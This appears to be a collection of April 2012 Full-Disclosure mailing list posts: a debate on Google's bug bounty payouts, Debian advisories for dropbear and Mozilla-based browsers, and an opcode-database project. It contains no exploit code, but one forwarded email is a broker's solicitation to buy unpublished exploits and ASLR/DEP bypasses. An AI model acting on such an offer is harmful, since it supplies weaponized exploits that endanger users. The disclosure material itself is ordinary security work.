of gratitude, some swag or some such), or at least make a real effort. Finding a code execution vuln in google's whatever app-of-the-day is non-trivial task that requires researchers to learn a completely new landscape. I would expect Google, of all people, to pay 10x to 100x this amount for this sort of thing.. A you-only-get-it-when-successful 20,000$ budget from Google is insulting, considering the perhaps massive time investment from the researcher. There is zero ability to make an argument that such businesses can't realistically outcompete all buyers of weaponized exploits as Michal has done [ :'( ]. The huge amount of damage that a badguy code executing on google wallet would cost far more than 2M in damages, repair work, lost business, and penalties; and yet they only pay a nice researcher 20 grand? You can't even live on that. Researchers aren't just kids with no responsibilities, they have mortgages and families. Increase the payouts and you not only get good guys doing good things but you also get bad guys doing good things (even if for the wrong reasons). n.b. The fact that badguys take risk when doing their badguy activities, including selling exploits, makes it even easier to outcompete the buyers. Still, this is a huge improvement on what it was if memory serves. A million thanks to Michal ! ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Vulnerability in Gentoo hardened
PD: Bad English written on purpose, please forgive me for any correct grammar I may have used :P PD2: Григорий seeing your historial I think the mail was a joke but if you read his advisories and 0-days you know: It's not a joke... -- Kind Regards Milan Berger Project-Mindstorm Technical Engineer --- project-mindstorm.net Fruehlingstrasse 4 90537 Feucht Germany Mob.: +49 176 22 98 76 02 https://www.ghcif.de http://www.nopaste.info (for sale) https://www.digital-bit.ch http://www.project-mindstorm.net twitter: http://twitter.com/twit4c ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] We're now paying up to $20, 000 for web vulns in our services
A you-only-get-it-when-successful 20,000$ budget from Google is insulting, considering the perhaps massive time investment from the researcher. [...] and yet they only pay a nice researcher 20 grand? You can't even live on that. Researchers aren't just kids with no responsibilities, they have mortgages and families People who want to make a living helping to improve Google security are welcome to apply for a job :-) We have a remarkably large and interesting security team. The program simply serves to complement that (and some other, contract-driven efforts), and it works for quite a few people who see it as a way to do something useful on the side, and get compensated for it, too. Now, I have done a fair amount of vulnerability research in my life, I do have a family and a mortgage - and I still wouldn't see $20k as an insult; but I know that this is subjective. In that spirit, you are at liberty to determine whether to participate, and how much time to invest into the pursuit :-) Cheers, /mz ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Vulnerability in Gentoo hardened
On Tue, 24 Apr 2012 17:36:55 +0200, Milan Berger said: if you read his advisories and 0-days you know: It's not a joke... I always thought it was misunderstood performance art... pgpBMDMGRP44M.pgp Description: PGP signature ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Vulnerability in Gentoo hardened
Which always turns out to be the best... Sent from my Windows Phone From: valdis.kletni...@vt.edu Sent: 4/24/2012 9:16 AM To: Milan Berger Cc: full-disclosure@lists.grok.org.uk Subject: Re: [Full-disclosure] Vulnerability in Gentoo hardened On Tue, 24 Apr 2012 17:36:55 +0200, Milan Berger said: if you read his advisories and 0-days you know: It's not a joke... I always thought it was misunderstood performance art... ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] We're now paying up to $20, 000 for web vulns in our services
IMHO, anyone who willingly, knowingly places customer data at risk by inviting attacks on their production systems is playing a very dangerous game. There is no guarantee that a vuln discovered by a truly honest researcher couldn't become a weapon for the dishonest researcher through secondary discovery I'm not sure I follow. Are you saying that the dishonest researcher will not try to find vulnerabilities if there is no reward program for the honest ones? He made a good example of a Slippery Slope. -- Ramon de C Valle / Red Hat Product Security Team ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Hacking WolframAlpha
Sharing source code with peers is one thing; sharing secrets over a public medium is another. The all-seeing eye of Google has no mercy, and once the secret has been seen, indexed, and copied to clone sites, it is no longer a secret. Now combine the search power of Google with the computational power of WolframAlpha and the results are limitless! It's raining data from these saturated clouds, and you just need to hold out your hands for a taste: http://resources.infosecinstitute.com/hacking-wolframalpha/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [SECURITY] [DSA 2456-1] dropbear security update
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 - - Debian Security Advisory DSA-2456-1 secur...@debian.org http://www.debian.org/security/Moritz Muehlenhoff April 23, 2012 http://www.debian.org/security/faq - - Package: dropbear Vulnerability : use after free Problem type : remote Debian-specific: no CVE ID : CVE-2012-0920 Danny Fullerton discovered a use-after-free in the Dropbear SSH daemon, resulting in potential execution of arbitrary code. Exploitation is limited to users, who have been authenticated through public key authentication and for which command restrictions are in place. For the stable distribution (squeeze), this problem has been fixed in version 0.52-5+squeeze1. For the testing distribution (wheezy), this problem has been fixed in version 2012.55-1. For the unstable distribution (sid), this problem has been fixed in version 2012.55-1. We recommend that you upgrade your dropbear packages. Further information about Debian Security Advisories, how to apply these updates to your system and frequently asked questions can be found at: http://www.debian.org/security/ Mailing list: debian-security-annou...@lists.debian.org -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.12 (GNU/Linux) iEYEARECAAYFAk+XCosACgkQXm3vHE4uylrKpQCfZpU4eKxztqi8zGzsAKdxzhLV kOcAoIshssbewzstn+sNTIJyNP7MJ10i =uWaI -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Fwd: Vulnerability research and exploit writing
Ferenc, I got one as well a few weeks ago. I suspect you are correct in your assumption. elazar On Tuesday, April 24, 2012 at 4:03 AM, Ferenc Kovacs tyr...@gmail.com wrote: Hi, Anybody else got this message? I think they are spamming the subscribers/regular participants of the list. -- Forwarded message -- From: steve ruskin ruskin.st...@gmail.com Date: Tue, Apr 24, 2012 at 9:56 AM Subject: Vulnerability research and exploit writing To: tyr...@gmail.com Hi , ** ** Trust all is well. I saw your experience in the field of vulnerability and exploit research and we have a scheme in our company to collaborate with researchers all over the world where we pay them on research done by them. Our interest is exploits which run over Windows 7, Snow Leopard with applications such MS Office, Adobe, Browsers, Media Player , Notepad etc along with native OS exploits as well as iphone, blackberry exploit. These exploits should be unpublished though the vulnerability may be public. We also have requirements to help us do ASLR and DEP bypass for exploits researched by us. ** ** Once you let us know about your skills and ideas we can provide you with our empanelment form via which you can register. We will look forward to your prompt response. ** ** Warm Regards, Steve Ruskin ** -- Ferenc Kovács @Tyr43l - http://tyrael.hu ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [SECURITY] [DSA 2457-1] iceweasel security update
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 - - Debian Security Advisory DSA-2457-1 secur...@debian.org http://www.debian.org/security/Moritz Muehlenhoff April 24, 2012 http://www.debian.org/security/faq - - Package: iceweasel Vulnerability : several Problem type : remote Debian-specific: no CVE ID : CVE-2012-0467 CVE-2012-0470 CVE-2012-0471 CVE-2012-0477 CVE-2012-0479 Several vulnerabilities have been discovered in Iceweasel, a web browser based on Firefox. The included XULRunner library provides rendering services for several other applications included in Debian. CVE-2012-0467 Bob Clary, Christian Holler, Brian Hackett, Bobby Holley, Gary Kwong, Hilary Hall, Honza Bambas, Jesse Ruderman, Julian Seward, and Olli Pettay discovered memory corruption bugs, which may lead to the execution of arbitrary code. CVE-2012-0470 Atte Kettunen discovered that a memory corruption bug in gfxImageSurface may lead to the execution of arbitrary code. CVE-2012-0471 Anne van Kesteren discovered that incorrect multibyte octet decoding may lead to cross-site scripting. CVE-2012-0477 Masato Kinugawa discovered that incorrect encoding of Korean and Chinese character sets may lead to cross-site scripting. CVE-2012-0479 Jeroen van der Gun discovered a spoofing vulnerability in the presentation of Atom and RSS feeds over HTTPS. For the stable distribution (squeeze), this problem has been fixed in version 3.5.16-14. For the unstable distribution (sid), this problem has been fixed in version 10.0.4esr-1. For the experimental distribution, this problem will be fixed soon. We recommend that you upgrade your iceweasel packages. Further information about Debian Security Advisories, how to apply these updates to your system and frequently asked questions can be found at: http://www.debian.org/security/ Mailing list: debian-security-annou...@lists.debian.org -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.12 (GNU/Linux) iEYEARECAAYFAk+XDkoACgkQXm3vHE4uylqfngCaAt6fHj+dr/zvoi0c4J3skHfR ftcAoLCxfj+mh6m0Uv0lJ734BoVYAYmd =m0na -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Fwd: Vulnerability research and exploit writing
Our interest is exploits which run over Windows 7, Snow Leopard with applications such MS Office, Adobe, Browsers, Media Player , Notepad etc Well, good thing I have a stash of Notepad 0-days. Most of them involve you saving a snippet of text as evil.bat and clicking on it, though. /mz ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [SECURITY] [DSA 2548-1] iceape security update
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 - - Debian Security Advisory DSA-2458-1 secur...@debian.org http://www.debian.org/security/Moritz Muehlenhoff April 24, 2012 http://www.debian.org/security/faq - - Package: iceape Vulnerability : several Problem type : remote Debian-specific: no CVE ID : CVE-2012-0455 CVE-2012-0456 CVE-2012-0458 CVE-2012-0461 CVE-2012-0467 CVE-2012-0470 CVE-2012-0471 CVE-2012-0477 CVE-2012-0479 Several vulnerabilities have been found in the Iceape internet suite, an unbranded version of Seamonkey: CVE-2012-0455 Soroush Dalili discovered that a cross-site scripting countermeasure related to Javascript URLs could be bypassed. CVE-2012-0456 Atte Kettunen discovered an out of bounds read in the SVG Filters, resulting in memory disclosure. CVE-2012-0458 Mariusz Mlynski discovered that privileges could be escalated through a Javascript URL as the home page. CVE-2012-0461 Bob Clary discovered memory corruption bugs, which may lead to the execution of arbitrary code. CVE-2012-0467 Bob Clary, Christian Holler, Brian Hackett, Bobby Holley, Gary Kwong, Hilary Hall, Honza Bambas, Jesse Ruderman, Julian Seward, and Olli Pettay discovered memory corruption bugs, which may lead to the execution of arbitrary code. CVE-2012-0470 Atte Kettunen discovered that a memory corruption bug in gfxImageSurface may lead to the execution of arbitrary code. CVE-2012-0471 Anne van Kesteren discovered that incorrect multibyte octet encoding may lead to cross-site scripting. CVE-2012-0477 Masato Kinugawa discovered that incorrect encoding of Korean and Chinese character sets may lead to cross-site scripting. CVE-2012-0479 Jeroen van der Gun discovered a spoofing vulnerability in the presentation of Atom and RSS feeds over HTTPS. For the stable distribution (squeeze), this problem has been fixed in version 2.0.11-11 For the unstable distribution (sid), this problem will be fixed soon. We recommend that you upgrade your iceape packages. Further information about Debian Security Advisories, how to apply these updates to your system and frequently asked questions can be found at: http://www.debian.org/security/ Mailing list: debian-security-annou...@lists.debian.org -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.12 (GNU/Linux) iEYEARECAAYFAk+XECIACgkQXm3vHE4uylrSLwCgsWqViAl/x/7dWbnFPGvkDb0G TVUAn2RnbfqVYXwGnHJ/deHKbzjrGy2L =8bek -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Opcodes Database Revival
Hi List, WANTED: one (free/available) .Net programmer I did a research on Windows Opcodes (return addresses) database https://en.wikipedia.org/wiki/Metasploit_Project#Opcode_Database http://www.blackhat.com/html/bh-eu-12/bh-eu-12-briefings.html My tools/results should be soon published (BlackHat website / Packetstorm...) Anyway, to publish the source code, i would like to collaborate with a .Net programmer to share a better/clean/more understable code. Anyway, in short it is an update of http://insecure.org/stf/smashstack.html -- Jerome Athias - NETpeas VP, Director of Software Engineer Palo Alto - Paris - Casablanca www.netpeas.com - Stay updated on Security: www.vulnerabilitydatabase.com The computer security is an art form. It's the ultimate martial art. smime.p7s Description: Signature cryptographique S/MIME ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
